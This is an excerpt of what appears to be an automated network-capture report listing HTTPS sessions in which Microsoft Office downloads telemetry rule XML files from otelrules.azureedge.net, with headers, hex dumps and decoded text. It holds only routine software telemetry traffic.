Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


Session IDSource IPSource PortDestination IPDestination Port
135192.168.2.55264313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:02 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:02 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:02 GMT
Content-Type: text/xml
Content-Length: 1377
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
ETag: "0x8DC582BEAFF0125"
x-ms-request-id: 27f7fbdb-301e-0096-2237-26e71d000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025602Z-16849878b78smng4k6nq15r6s400000008z0000000009kpq
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:02 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


Session IDSource IPSource PortDestination IPDestination Port
136192.168.2.55264413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:02 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:02 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:02 GMT
Content-Type: text/xml
Content-Length: 1399
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
ETag: "0x8DC582BE0A2434F"
x-ms-request-id: 3452001d-001e-0065-12df-250b73000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025602Z-16849878b78hh85qc40uyr8sc800000007r000000000andd
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:02 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


Session IDSource IPSource PortDestination IPDestination Port
137192.168.2.55264513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:03 UTC192OUTGET /rules/rule700150v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:03 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:03 GMT
Content-Type: text/xml
Content-Length: 1362
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
ETag: "0x8DC582BE54CA33F"
x-ms-request-id: e9bbe3b2-401e-005b-3496-259c0c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025603Z-15b8d89586fzcfbd8we4bvhqds00000002eg000000002gn8
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:03 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
138192.168.2.55264713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:03 UTC192OUTGET /rules/rule703451v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:03 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:03 GMT
Content-Type: text/xml
Content-Length: 1409
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
ETag: "0x8DC582BDFC438CF"
x-ms-request-id: 8b819aaa-a01e-0084-563d-269ccd000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025603Z-15b8d89586fzcfbd8we4bvhqds00000002f0000000001fp5
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:03 UTC1409INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


Session IDSource IPSource PortDestination IPDestination Port
139192.168.2.55264613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:03 UTC192OUTGET /rules/rule703450v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:03 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:03 GMT
Content-Type: text/xml
Content-Length: 1372
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
ETag: "0x8DC582BE6669CA7"
x-ms-request-id: 8e66950d-f01e-0003-769c-274453000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025603Z-15b8d89586flzzksdx5d6q7g1000000002gg00000000bz88
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:03 UTC1372INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


Session IDSource IPSource PortDestination IPDestination Port
140192.168.2.55264813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:03 UTC192OUTGET /rules/rule700901v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:03 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:03 GMT
Content-Type: text/xml
Content-Length: 1408
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
ETag: "0x8DC582BE1038EF2"
x-ms-request-id: 94cf4c5c-c01e-0034-1914-272af6000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025603Z-16849878b78bcpfn2qf7sm6hsn00000008yg00000000ppen
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:03 UTC1408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


Session IDSource IPSource PortDestination IPDestination Port
141192.168.2.55264913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:03 UTC192OUTGET /rules/rule700900v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:03 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:03 GMT
Content-Type: text/xml
Content-Length: 1371
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT
ETag: "0x8DC582BED3D048D"
x-ms-request-id: b018d53a-601e-0050-79af-272c9c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025603Z-r197bdfb6b4d9xksru4x6qbqr000000007gg00000000ba91
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:03 UTC1371INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6f 66 69 6e 67 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F


Session IDSource IPSource PortDestination IPDestination Port
142192.168.2.55265013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:03 UTC192OUTGET /rules/rule702251v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:04 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:04 GMT
Content-Type: text/xml
Content-Length: 1389
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
ETag: "0x8DC582BE0F427E7"
x-ms-request-id: 1a449efb-c01e-0082-601d-27af72000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025604Z-r197bdfb6b48pl4k4a912hk2g400000006pg00000000b65c
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:04 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="


Session IDSource IPSource PortDestination IPDestination Port
143192.168.2.55265113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:04 UTC192OUTGET /rules/rule702250v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:04 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:04 GMT
Content-Type: text/xml
Content-Length: 1352
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
ETag: "0x8DC582BDD0A87E5"
x-ms-request-id: f75da22b-f01e-0085-0130-2788ea000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025604Z-15b8d89586fvpb59307bn2rcac00000002p0000000002s2n
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:56:04 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="Medium" /> <F T="2"> <O T


Session IDSource IPSource PortDestination IPDestination Port
144192.168.2.55265213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:04 UTC192OUTGET /rules/rule702651v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:04 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:04 GMT
Content-Type: text/xml
Content-Length: 1395
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
ETag: "0x8DC582BDEC600CC"
x-ms-request-id: 7813ed72-001e-0034-3804-25dd04000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025604Z-15b8d89586f42m673h1quuee4s0000000bhg000000007df5
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:56:04 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 36 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 65 64 69 61 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 65 64 69
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702651" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Media.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMedi


Session IDSource IPSource PortDestination IPDestination Port
145192.168.2.55265313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:04 UTC192OUTGET /rules/rule702650v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:04 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:04 GMT
Content-Type: text/xml
Content-Length: 1358
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
ETag: "0x8DC582BDEA1B544"
x-ms-request-id: b2907cd8-f01e-0096-39f3-2610ef000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025604Z-16849878b785dznd7xpawq9gcn00000008xg000000000m6e
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:56:04 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 36 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 65 64 69 61 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 65 64 69 61 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702650" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Media" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMedia" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
146192.168.2.55265413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:56:04 UTC192OUTGET /rules/rule703101v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:56:04 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:56:04 GMT
Content-Type: text/xml
Content-Length: 1393
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
ETag: "0x8DC582BE0F93037"
x-ms-request-id: b5268a27-501e-0047-22c2-28ce6c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025604Z-17c5cb586f6hn8cl90dxzu28kw00000007kg000000004btt
